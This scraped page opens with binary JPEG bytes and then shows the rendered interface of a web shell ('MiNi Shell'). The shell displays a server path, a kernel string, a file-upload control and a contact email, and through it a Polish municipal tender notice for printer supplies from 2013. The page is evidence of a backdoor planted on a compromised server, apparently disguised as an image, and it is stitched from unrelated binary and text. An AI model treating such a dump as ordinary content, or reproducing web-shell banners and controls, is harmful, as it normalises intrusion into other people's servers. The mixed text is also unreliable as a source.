JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131219/528980-N-2013.html

<p class="kh_header"><b>Sławno: Dostawa tuszów, tonerów do drukarek, faksów i kserokopiarek oraz papieru do drukowania  dla potrzeb Urzędu Gminy w Sławnie w roku 2014</b><br>
<b>Numer ogłoszenia: 528980 - 2013; data zamieszczenia: 19.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławno , ul. Marszałka Józefa Piłsudskiego 31, 26-332 Sławno, woj. łódzkie, tel. 044 755-18-50, faks 044 755-18-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugslawno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa tuszów, tonerów do drukarek, faksów i kserokopiarek oraz papieru do drukowania  dla potrzeb Urzędu Gminy w Sławnie w roku 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest sukcesywna dostawa fabrycznie nowych  tuszów, tonerów do drukarek komputerowych,  faksów i kserokopiarek  oraz papieru 
do drukowania  dla potrzeb Urzędu Gminy w Sławnie w roku 2014

2. Zakres dostawy:



Lp.	Nazwa asortymentu	j.m.	ILOŚĆ
			
1.	Toner oryg. do HP LJ 1020	szt.	60
2.	Toner oryg. do HP LJ 1320	szt.	6
3.	Toner oryg. do Kyocera FS-1300D	szt.	6
4.	Toner oryg. do Panasonic KX-FL613	szt.	4
5.	Toner oryg. do HP LJ Pro 400	szt.	12
6.	Tusz czarny oryg. do HP DJ 1220C	szt.	12
7.	Tusz kolor oryg. do HP DJ 1220C	szt.	12
8.	Toner oryg. do Brother HL-2240	szt.	12
9.	Toner oryg. do Canon FC 200	szt.	1
10.	Tusz czarny 11,5 ml .oryg. do Epson Stylus Photo 1500W	szt.	24
11.	Tusz żółty 6,6 ml. oryg. do Epson Stylus Photo 1500W	szt.	24
12.	Tusz jasnobłękitny 6,6 ml. oryg. do Epson Stylus Photo 1500W	szt.	24
13.	Tusz błękitny 6,6 ml. oryg. do Epson Stylus Photo 1500W	szt.	24
14.	Tusz jasnoamarantowy 6,6 ml. oryg. do Epson Stylus Photo1500W	szt.	24
15.	Tusz amarantowy 6,6 ml. oryg. do Epson Stylus Photo 1500W	szt.	24
16.	Zestaw atramentów sublimacyjnych 100ml do Epson Stylus Photo 1500W	szt.	1
17.	Zestaw czyszczący do sublimacji Epson Stylus Photo 1500W	szt.	1
18.	System stałego zasilania atramentowego do Epson Stylus Photo 1500W	szt.	1
19.	Zestaw atramentów (6x130ml) do Epson Stylus Photo 1500W	szt.	5
20.	Tusz oryg. do HP Photosmart 245	szt.	1
21.	Toner oryg. do Kyocera FS-1128MFP	szt.	12
22.	Toner oryg. do Canon NP 5060	szt.	1
23.	Toner oryg. do Canon IR 1600	szt.	12
24.	Toner oryg. do Canon IR 2020i	szt.	6
25.	Toner oryg. do Canon IR 2520	szt.	6
26.	Toner oryg. do Xerox Phaser 3010	szt.	3
27.	Toner oryg. do Lexmark E260DN	szt.	3
28.	Tusz czarny oryg. do HP DJ845C	szt.	1
29.	Papier ksero A4	ryza (500 szt.)	800
30.	Papier ksero A3	ryza (500 szt.)	40
31.	Papier fotograficzy do drukarki atramentowej błyszczący A3 gramatura min. 250	szt.	500
32.	Papier fotograficzy dwustronny do drukarki atramentowej błyszczący A4 gramatura min. 250	szt.	500
33.	Papier fotograficzy do drukarki atramentowej błyszczący A4 gramatura min. 250	szt.	900
34.	Papier fotograficzy do drukarki atramentowej matowy A4 gramatura min. 250	szt.	300
35.	Papier kredowy do drukarki atramentowej błyszczący A4 gramatura min. 250	szt.	600
36.	Papier kredowy do drukarki atramentowej matowy A4 gramatura min. 250	szt.	400
37.	Papier kredowy do drukarki atramentowej błyszczący A3 gramatura min. 250	szt.	200
38.	Papier kredowy  do drukarki atramentowej matowy A3 gramatura min. 250	szt.	100
39.	Papier transferowy do sublimacji A3	szt.	100
40.	Papier samoprzylepny A4 do drukarki atramentowej	szt.	200
41.	Papier samoprzylepny A3 do drukarki atramentowej	szt.	100
42.	Płyty BD-R 25GB do nadruku atramentowego	szt.	100
43.	Płyty DVD-R DL 8,5GB do nadruku atramentowego	szt.	300
44.	Płyty DVD-R 4,7GB do nadruku atramentowego	szt.	800
45.	Płyty CD 700MB do nadruku atramentowego	szt.	600
46.	Pudełka slim na płyty CD 	szt.	500
47.	Koperty na płyty CD 	szt.	1000


3.  Dostawa będzie następować w terminie nie dłuższym niż 5 dni od dnia złożenia przez 
       Zamawiającego zamówienia, w dniach od poniedziałku do piątku w godz. 7:30 - 14:00, 
       a w sytuacjach szczególnych również w innych dniach i godzinach. 

4.   Wielkość przedmiotu zamówienia oraz wartość umowy może ulec zmianie, stosownie do 
       faktycznych wielkości dostaw do Zamawiającego, przy zachowaniu  cen jednostkowych 
       podanych w ofercie. 

5. Zamówienie obejmuje również transport  materiałów eksploatacyjnych do miejsca 
       wskazanego przez Zamawiającego i rozładunek materiałów.
	
6. Miejsce dostarczenia towaru -  Urząd Gminy Sławno,  Sławno ul. Marszałka Józefa 
      Piłsudskiego 31


7. Oferowane tonery i tusze muszą być oryginalne i nowe. Poprzez określenie oryginalne 
     i nowe należy rozumieć tonery i tusze fabrycznie nowe, nieregenerowane,    
     wyprodukowane przez producenta wskazanej wyżej drukarki lub kserokopiarki.

8. Za fabrycznie nowy nie uznaje się wyrobu gdzie pojemnik został jedynie wyczyszczony
     i ponownie napełniony tonerem lub tuszem. Jakość wydruku (kopii), wydajność, szybkość 
    schnięcia (utrwalenia), nie zamazywania się druku (kopii) winna odpowiadać wyrobowi
    producenta urządzenia, w tym również w zakresie bezawaryjnej pracy tego urządzenia, 
    w którym będzie zainstalowany.

9.  Wszystkie dostarczane tonery i tusze muszą być oznaczone numerem katalogowym lub 
      innym oznaczeniem stosowanym przez producenta, posiadać oryginalne fabryczne 
      opakowanie oraz zabezpieczenia stosowane przez producentów (np. hologramy).
      Sposób opakowania musi umożliwiać identyfikację produktu (ilość, rodzaj, parametry 
      techniczne) bez konieczności naruszania opakowania.

10.   Opakowanie nie może posiadać śladów otwarcia lub uszkodzenia

11. W przypadku oferowania nieodpowiedniego jakościowo produktu Wykonawca, którego 
       oferta zostanie wybrana w niniejszym postępowaniu zobowiązany będzie do jego 
       wymiany, na produkt producenta urządzenia w tej samej jednostkowej cenie ofertowej. 

12. W przypadku, gdy z powodu dostarczenia nieodpowiednich tonerów i tuszów nastąpi 
       uszkodzenie urządzenia drukującego, stwierdzone przez firmę świadczącą usługi    
       serwisowania sprzętu na rzecz Urzędu Gminy, Zamawiający obciąży Wykonawcę 
       kosztami naprawy oraz kosztami użytego nieodpowiedniego tonera lub tuszu 
       z przysługującego mu wynagrodzenia. 

13. Wymagany okres ważności dostarczonych materiałów eksploatacyjnych - minimum 12 
      miesięcy od dnia dostawy. 

14. Do obowiązków  dostawcy należy również odbiór opakowań po zużytych materiałach. 

15. Parametry techniczne papieru:
Dostarczony papier musi spełniać następujące parametry techniczne: 
Format: A-4  i  A-3 
Gramatura 	80 g/m2 
+)- 3 g)m2
Grubość	min. 108 +)-3 mikronów
Biel(CIE)	min. 166
Wilgotność 	3,4 - 5,3 procent
Gładkość	min 150 +)- 50 cm3)min, max. 250 cm3)min
Nieprzezroczystość 	min. 90 procent 
Przepuszczalność 
powietrza 	min 1100 cm3)min, max. 1300 cm3)min 


16. Arkusze muszą być niezawilgocone, czyste, równo i prostokątnie obcięte. 
         Niedopuszczalne są takie wady jak plamy, zabrudzenia, uszkodzenia mechaniczne, fałdy, 
        załamania, smugi itp. Papier nie może ulegać deformacjom przy druku dwustronnym.
17. Papier musi być uniwersalny do urządzeń drukujących.  Jakość papieru nie może być 
       gorsza niż określona powyższymi wymaganiami. 
18.   Ryza papieru w rozumieniu SIWZ obejmuje 500 arkuszy. 
19.  Papier musi spełniać wymagania określone przez normę PN-EN ISO 9706:2001 lub 
         wymagania zgodne z normami ISO 9000. 
20. Wykonanie zamówienia obejmuje transport oraz rozładunek z wniesieniem do 
         wskazanego w zapotrzebowaniu pomieszczenia Zamawiającego. 




21. Opis ten zawiera minimalne wymagania, co oznacza, ze wykonawca może zaoferować przedmiot 
       zamówienia charakteryzujący się zbliżonymi parametrami technicznymi,  lub  równoważnymi .

22. Zaoferowany przez Wykonawcę asortyment ma być najwyższej jakości pod względem 
         technicznym i użytkowym spełniać warunki obowiązujących norm oraz posiadać aktualne 
       dokumenty   dopuszczające go do użytku, zgodnie z obowiązującymi przepisami prawa. 
23. Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy 
        pochodzenie - należy przyjąć, że wskazane patenty, znaki  towarowe, pochodzenie określają 
       parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że zamawiający dopuszcza złożenie 
       oferty w tej części przedmiotu zamówienia  o równoważnych parametrach technicznych, 
      eksploatacyjnych i użytkowych.
24. Zgodnie z art. 30 ust. 5 ustawy Prawo zamówień publicznych, Wykonawca, który powołuje się
       na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, 
      że oferowane przez niego dostawy, spełniają wymagania określone przez zamawiającego 
       (np. przedstawić porównanie parametrów asortymentu wymaganego przez zamawiającego 
      z parametrami oferowanego asortymentu itp.).
25.  Rozliczenie będzie następować za faktycznie odebrane materiały.
      


Wykonawca zobowiązany jest do wskazania w ofercie części zamówienia, którą część zamówienia zamierza powierzyć podwykonawcom  jeżeli dotyczy, art. 36 ust. 4 ustawy 
z dnia 29.01.2004 r. - Prawo zamówień publicznych ( Dz. U. z 2013 r. poz. 907 z późn. zm. )..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.10-5, 30.19.76.30-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony we wszystkich pozycjach  formularz ofertowy (wg załączonego wzoru Nr 1 ) 
2.	Formularz cenowy- wg załączonego wzoru Nr 2 - służy do celów poglądowych nie podlega ocenie
3.   Dokument pełnomocnictwa - ( oryginał lub notarialnie poświadczona kopia ) do podpisania oferty, 
      jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem 
      rejestracyjnym, również w przypadku złożenia  oferty przez wykonawców ubiegających 
      się o zamówienie wspólnie ( np. konsorcjum, sp. cywilna ), pełnomocnictwo powinno 
      jednoznacznie   określać zakres umocowania  i wskazywać osobę pełnomocnika.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>7. W szczególności Zamawiający ustanawia następujące warunki umożliwiające zmianę treści umowy:
1. zmiany ogólne :
a) zmiana adresu)siedziby Zamawiającego)Wykonawcy,
b) zmiana osób występujących po stronie Zamawiającego)Wykonawcy,
c) zdarzenia losowe osób
2. zmiany wpływające na wysokość wynagrodzenia:
a) zmiana postanowień umowy w związku ze zmianą stawki podatku od towarów i usług   
     (VAT) w przypadku zmiany obowiązujących, w tym w zakresie przepisów.
b) ilość ( większa lub mniejsza ), po cenach jednostkowych zgodnych z ofertą
3. Określa się następujący tryb dokonywania zmian postanowień umowy:
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron 
      wyrażoną na piśmie, pod rygorem nieważności,
b) strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do 
     udokumentowania zaistnienia powyższych okoliczności,
c) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na  piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugslawno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
Sławno pokój Nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 10:00, miejsce: Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
Sławno pokój Nr 13 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com